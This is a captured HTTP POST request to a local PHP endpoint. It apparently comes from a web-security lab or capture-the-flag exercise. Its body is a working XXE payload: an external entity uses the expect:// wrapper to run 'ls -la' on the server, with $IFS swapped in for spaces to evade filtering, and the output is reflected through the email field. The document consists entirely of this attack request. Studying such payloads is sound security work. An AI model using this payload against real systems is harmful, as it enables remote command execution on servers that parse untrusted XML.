POST /process.php HTTP/1.1
Host: 127.0.0.1:5000
Content-Length: 225
sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118"
sec-ch-ua-platform: "macOS"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://127.0.0.1:5000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:5000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
 <!ENTITY xxe SYSTEM "expect://ls$IFS/$IFS-la">]>
<root>
  <name>Joe</name>
  <tel>ufgh</tel>
  <email>START_&xxe;_END</email>
  <password>kjh</password>
</root>
